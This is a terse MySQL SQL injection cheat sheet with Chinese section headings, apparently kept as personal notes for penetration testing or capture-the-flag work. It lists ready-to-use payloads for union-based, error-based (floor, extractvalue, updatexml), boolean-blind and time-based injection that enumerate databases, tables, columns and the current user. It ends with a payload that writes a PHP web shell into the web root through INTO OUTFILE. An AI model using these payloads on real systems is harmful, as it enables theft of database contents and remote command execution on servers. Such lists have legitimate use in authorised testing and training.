### mysql
连接
mysql -u root -p'root' -h 192.168.199.197 -P 3306
### 联合查询
1' union select 1,2,3-- -
查数据库
database()
1' union select schema_name,1 from information_schema.schemata
查表
1' union select group_concat(table_name),database() from information_schema.tables where table_schema = database() #
查列
1' union select group_concat(column_name),database() from information_schema.columns where table_schema = database() #
### 报错注入
floor
-1' and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)y)--+
extractvalue
-1' and extractvalue(1,concat(0x7e,(select user()),0x7e))--+
updatexml
-1' and updatexml(1,concat(0x7e,(select user()),0x7e),1)--+
### 布尔盲注
1' and length(database()>=8)--
1' and left(database(),1)='a'--
1' and substr(database(),2,1)='a'--
### 时间注入
1’ and if(length(database())=4,sleep(5),1)
### shell
写文件
'+UNION+SELECT+null,"<%3fphp+system($_GET['cmd'])%3b%3f>",+null,+null+INTO+OUTFILE+"/var/www/html/tmp/a.php"+--+//